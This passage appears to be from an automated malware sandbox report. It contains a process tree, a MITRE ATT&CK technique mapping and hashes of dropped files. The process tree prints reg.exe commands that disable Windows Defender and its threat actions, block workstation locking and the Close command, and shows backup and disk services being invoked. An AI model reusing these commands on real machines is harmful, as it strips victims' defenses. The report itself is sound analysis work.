C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:1808
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f1⤵PID:3972
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f1⤵PID:4216
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f1⤵PID:3388
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f1⤵PID:2844
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:2312
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:9496
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:10328
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:13028
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4544 -ip 45441⤵PID:7868
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5accdeab4a07a6154df3bcb1490094daf
SHA13387dc22176c8614a4688c0700801afe96411694
SHA256acae702e8e7a3a68e58f62c3b310c1ec995972afbc5e4f6f6bd6692195eb7aa5
SHA512d6c0905c18c4b5beacc83757e4a267bdaaa22b78fb2ef384562d8ec835538e35610aa9aace06e607c91176fd5b3a052be5cac215ee944ee41b7a0ac48e4a5450
-
Filesize
12KB
MD5ce2213552841fea3e2b4ebcd894258ed
SHA1a5111896ec9884ed42c8c16f29410050e9023d5b
SHA256eae5ab0b8843329caca1f2789d115ee3f6d2f0cfee2ccde940d1c9cdc19cca3b
SHA5125692726f078ca9be085e35fd90d91814aec9ccb896a7444bf4c1e2a64ebe6a3235f477f5bb201410e2646374f473088eba39bed60be425b630895285be7bd521
-
Filesize
684B
MD5a436088125df3f44ba98c45886a62282
SHA1606593fb439df3509c47a7768f85dc29820b7644
SHA256345d6585256edfc9d6e79b0217a3f0cc1d7d2b0fc08ebea406d7d78c2dc6536a
SHA51286ce714a09d45eecc3584d224e4673f7fb0a80781903d36478933265b7727dac5f48c6e198fdacc26c7530626cabccf559c659f8ada751b75ff0733dd4a79984